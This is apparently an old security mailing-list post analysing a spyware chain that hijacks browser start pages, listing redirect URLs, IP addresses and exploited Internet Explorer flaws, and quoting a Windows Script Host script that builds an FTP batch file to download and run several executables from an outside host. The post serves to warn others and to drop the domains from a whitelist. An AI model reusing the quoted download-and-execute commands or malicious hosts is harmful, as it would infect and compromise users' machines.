My bad, I inadvertently included a message which was about trojan-like spyware, which is publically avialable at:
http://seclists.org/lists/bugtraq/2004/May/0153.html
http://65.17.207.40/framepb_1u.php
which redirects to
http://si1.default-homepage-network.com/180/180.htm?si-001
which redirects to
http://object.passthison.com/vu083003/object.cgi?si1
which uses the Object Data vulnerability to change your startpage to
http://default-homepage-network.com/start.cgi?hkcu
the parameter at the end is either HKCU or HKLM depending on what registry branch lead you there. This serves to notify default-homepage-network whether your machine has been compromised with user or administrator privileges
start.cgi also opens a few popup windows with advertisements, after which it opens the following page=20
http://default-homepage-network.com/newspynotice.html
that wants to sell you a cure against spyware which hijacks your start page - as theirs just did.
That page also secretly opens
http://object.passthison.com/vu083003/newobject1.cgi http://69.50.139.61/hp1/hp1.htm http://www.achtungachtung.com/0021/index.php
newobject1.cgi executes the following commands through the Windows Script Host object:
wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6); wsh.Run('command /C echo tmpacct>>o',false,6); wsh.Run('command /C echo 12345>>o',false,6); wsh.Run('command /C echo bin>>o',false,6); wsh.Run('command /C echo get install2.exe>>o',false,6); wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6); wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6); wsh.Run('command /C echo get CS4P028.exe>>o',false,6); wsh.Run('command /C echo bye>>o',false,6); wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o
o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe
o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe infamous_downloader.exe >>o.bat',false,6); wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch http://69.50.139.61/hp1/HP1.chm::/hp1.htm
framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
Other files that are attempted to be delivered are
http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe http://validation-required.info/ http://www.popmoney.net/ip/index.php http://www.portalone.hostance.com.com/italia.exe
Therefore I am taking all those domais out of the possible whitelist.
Jeff C.